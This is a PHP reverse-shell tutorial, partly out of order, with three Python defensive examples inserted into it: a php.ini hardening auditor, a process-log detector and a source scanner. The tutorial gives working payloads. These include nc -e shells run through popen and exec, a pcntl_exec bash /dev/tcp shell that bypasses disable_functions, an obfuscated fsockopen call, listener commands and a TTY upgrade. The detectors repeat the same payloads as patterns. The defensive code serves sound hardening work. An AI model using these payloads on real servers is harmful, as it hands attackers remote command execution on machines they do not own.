The simple script might not work on all systems due to differences in the nc command or its location. A more universally compatible version can be:
<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$p = popen("nc $ip $port -e /bin/sh", "w");
if (!$p) {
    die("Failed to create process");
}
?>
On your attacking machine (Kali Linux or any VPS), you need a listener.
nc -lvnp 4444
Modern hosting providers often disable dangerous PHP functions like exec, shell_exec, passthru, and system in the php.ini file.
If you try the standard shells and get errors (or silence), check phpinfo() to see what is disabled. If standard functions are blocked, you can often bypass this using the PCNTL extension.
The PCNTL Bypass:
If pcntl_exec is enabled, you can fork a process to execute bash directly. This is a common bypass for restrictive environments.
<?php
pcntl_exec("/bin/bash", Array("-c", "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"));
?>
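The bypass above works only when disable_functions stops at the four names most guides list and leaves popen and pcntl_exec untouched. The following audit script is an added example, not code from the original article: it parses the disable_functions line of a php.ini, compares it with a baseline, and prints a merged line. The baseline (which adds proc_open and pcntl_fork to the functions named on this page) and the sample php.ini text are constructed for the demonstration and should be adjusted to what the application actually needs.

```python
"""Audit a php.ini 'disable_functions' line against a baseline.

Added example (not from the original article). The baseline and the sample
php.ini below are constructed; tune the baseline to your application.
"""
import re

# Functions the article shows launching a shell, plus the rest of the
# process-control family. A host that blocks only exec/shell_exec/passthru/
# system still leaves popen and pcntl_exec open, which is the gap the
# PCNTL bypass relies on.
BASELINE = (
    "exec", "shell_exec", "passthru", "system",
    "popen", "proc_open",
    "pcntl_exec", "pcntl_fork",
)

# Constructed sample: a "hardened" php.ini that forgot popen and pcntl_*.
SAMPLE_INI = """
; php.ini (constructed sample)
expose_php = Off
disable_functions = exec,shell_exec,passthru,system, phpinfo
allow_url_fopen = Off
"""


def parse_disable_functions(ini_text):
    """Return the set of names in disable_functions (last assignment wins)."""
    disabled = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"')
            disabled = {n.strip().lower() for n in value.split(",") if n.strip()}
    return disabled


def missing_from_baseline(ini_text, baseline=BASELINE):
    """Baseline names that the ini file leaves enabled, in baseline order."""
    disabled = parse_disable_functions(ini_text)
    return [name for name in baseline if name not in disabled]


def suggested_line(ini_text, baseline=BASELINE):
    """A disable_functions line that keeps existing entries and adds the gaps."""
    merged = parse_disable_functions(ini_text) | set(baseline)
    return "disable_functions = " + ",".join(sorted(merged))


if __name__ == "__main__":
    gaps = missing_from_baseline(SAMPLE_INI)
    print("still enabled:", ", ".join(gaps))
    print(suggested_line(SAMPLE_INI))
```

Check the effective value with phpinfo() or php -i rather than the file alone, since per-directory and pool configuration can override it. Where the application never needs process control, not loading the pcntl extension in the web SAPI at all is the stronger fix; the disable_functions entry is the backstop.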
So you caught your PHP reverse shell. It’s ugly. It doesn't have tab completion, text editors like nano won't work, and you can't use su. You have a "dumb" shell.
The Python Upgrade Trick: Most Linux servers have Python installed. Run this command immediately after catching the shell to get a fully interactive TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Then, press Ctrl+Z to background the shell. On your local machine, type:
stty raw -echo
fg
Finally, type export TERM=xterm. You now have a fully functional shell with arrow keys, tab completion, and text editors.
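Every step of this sequence leaves a trace in process telemetry: the PHP worker spawns sh or bash, the argv carries nc -e or a /dev/tcp/ redirection, and the upgrade spawns python with pty.spawn in its arguments. The following detector is an added example, not code from the original article. It runs over a constructed process-exec log in a simplified pipe-separated format (timestamp|user|parent|command|argv) that stands in for whatever auditd or an EDR emits; the field mapping, the web-parent list and the sample lines are all assumptions made for the demo.

```python
"""Flag shells spawned under a web-server worker in process-exec telemetry.

Added example (not from the original article). The log format is a
constructed, simplified one: timestamp|user|parent|command|argv.
"""
import re

# Process names that front a PHP application (assumed list; extend to taste).
WEB_PARENTS = {"php", "php-fpm", "php-cgi", "apache2", "httpd", "nginx"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Argv fragments from the techniques described above:
# nc -e, bash /dev/tcp redirection, and the python pty upgrade.
HIGH_CONFIDENCE = (
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bnc\b.*\s-e\s"),
    re.compile(r"pty\.spawn\("),
)

# Constructed sample log; 203.0.113.5 is a documentation address.
SAMPLE_LOG = """\
2024-05-01T10:00:01|www-data|php-fpm|sh|sh -c nc 203.0.113.5 4444 -e /bin/sh
2024-05-01T10:00:02|www-data|php-fpm|bash|bash -c bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
2024-05-01T10:00:09|www-data|sh|python|python -c import pty;pty.spawn("/bin/bash")
2024-05-01T10:00:15|www-data|php-fpm|sh|sh -c /usr/bin/convert in.png out.jpg
2024-05-01T10:01:00|deploy|bash|python|python manage.py migrate
"""


def parse(line):
    """Split one log line into its five fields (argv may contain '|')."""
    ts, user, parent, comm, argv = line.split("|", 4)
    return {"ts": ts, "user": user, "parent": parent, "comm": comm, "argv": argv}


def classify(event):
    """Return 'high', 'medium', or None when the event looks benign."""
    if any(p.search(event["argv"]) for p in HIGH_CONFIDENCE):
        return "high"
    # A shell started by the PHP worker deserves a look even with a clean
    # argv. Image converters and the like do run through sh -c, so this
    # tier is for triage, not paging.
    if event["parent"] in WEB_PARENTS and event["comm"] in SHELLS:
        return "medium"
    return None


def scan(log_text):
    """Return [(severity, event)] for every flagged line, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse(line)
        sev = classify(event)
        if sev:
            hits.append((sev, event))
    return hits


if __name__ == "__main__":
    for sev, ev in scan(SAMPLE_LOG):
        print(f"{sev:6} {ev['ts']} {ev['user']} {ev['parent']} -> {ev['comm']}: {ev['argv']}")
```

The medium tier is the one worth tuning: list the sh -c invocations your application legitimately makes and allow them explicitly, so that anything else a web worker spawns stands out. The high tier needs no tuning; there is no benign reason for a web worker's argv to contain a /dev/tcp/ redirection.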
Sometimes, for simplicity and evasion, a one-liner is used:
<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>
A PHP reverse shell is a script written in PHP that, when executed on a server, initiates a TCP or UDP connection back to an attacker's machine, granting remote command-line access. Unlike bind shells (which listen on a local port), reverse shells bypass many inbound firewall rules because the connection originates from the internal network.
Before running the PHP script on the target machine, you need to set up a listener on your machine. Open a terminal and use nc (netcat) to listen on a specific port:
nc -l -p 4444
$f = "fso"."ckop"."en";
$s = $f($ip, $port);
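Grepping a web root for "exec(" catches the one-liner, but not the fragment directly above, where the function name is assembled as "fso"."ckop"."en" and never appears as one token. The following scanner is an added example, not code from the original article: it reports direct calls to the shell and socket functions used on this page, resolves variables assigned from concatenated string literals and flags them when the result is such a function name, and looks for the payload strings (/dev/tcp/, nc -e) from the snippets above. The sample PHP snippets are constructed to mirror those on this page, and the function list is my own baseline.

```python
"""Static scan of PHP source for reverse-shell indicators.

Added example (not from the original article). It handles direct calls and
the concatenated-literal trick ("fso"."ckop"."en"); the samples are constructed.
"""
import re

# Assumed baseline of shell/socket functions worth flagging in a web root.
DANGEROUS = {
    "exec", "shell_exec", "passthru", "system", "popen", "proc_open",
    "pcntl_exec", "fsockopen", "stream_socket_client",
}

# Payload fragments from the techniques discussed above.
PAYLOAD_PATTERNS = (
    ("dev-tcp redirection", re.compile(r"/dev/tcp/")),
    ("netcat -e", re.compile(r"\bnc\b[^;\n]*\s-e\s")),
)

# name(  but not shell_exec matching as exec, and not $exec( (a variable)
DIRECT_CALL = re.compile(r"(?<![\w$])(" + "|".join(sorted(DANGEROUS)) + r")\s*\(")
# $name = 'lit' . "lit" . 'lit';  with only string literals joined by '.'
STR_LIT = r"(?:'[^']*'|\"[^\"]*\")"
CONCAT_ASSIGN = re.compile(
    r"\$(\w+)\s*=\s*(" + STR_LIT + r"(?:\s*\.\s*" + STR_LIT + r")*)\s*;"
)
VAR_CALL = re.compile(r"\$(\w+)\s*\(")


def _join_literals(expr):
    """Evaluate a concatenation of plain string literals to one string."""
    return "".join(m.group(0)[1:-1] for m in re.finditer(STR_LIT, expr))


def scan_php(source):
    """Return a list of (kind, detail) findings for one PHP source text."""
    findings = []
    for m in DIRECT_CALL.finditer(source):
        findings.append(("direct call", m.group(1)))
    # Variables whose value is a dangerous function name built from pieces.
    aliases = {}
    for m in CONCAT_ASSIGN.finditer(source):
        value = _join_literals(m.group(2))
        if value.lower() in DANGEROUS:
            aliases[m.group(1)] = value.lower()
            findings.append(("concatenated name", f"${m.group(1)} = {value}"))
    # ...and the places where such a variable is then called as a function.
    for m in VAR_CALL.finditer(source):
        if m.group(1) in aliases:
            findings.append(("variable function call",
                             f"${m.group(1)}() -> {aliases[m.group(1)]}"))
    for label, pat in PAYLOAD_PATTERNS:
        if pat.search(source):
            findings.append(("payload string", label))
    return findings


# Constructed samples mirroring the snippets in the article.
SAMPLE_ONE_LINER = '<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>'
SAMPLE_PCNTL = ('<?php pcntl_exec("/bin/bash", Array("-c", '
                '"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1")); ?>')
SAMPLE_OBFUSCATED = '<?php $f = "fso"."ckop"."en"; $s = $f($ip, $port); ?>'
SAMPLE_BENIGN = '<?php $count = "item"."count"; echo $count; ?>'

if __name__ == "__main__":
    for name, src in [("one-liner", SAMPLE_ONE_LINER), ("pcntl", SAMPLE_PCNTL),
                      ("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_php(src))
```

The scanner is a heuristic, not a parser: it resolves only the literal-concatenation form shown on this page, so if review turns up other ways of building a name at runtime, extend _join_literals rather than the pattern list. Run it across the document root on a schedule and diff the findings against the last run; a new finding in a directory the deployment process does not write to is the interesting case.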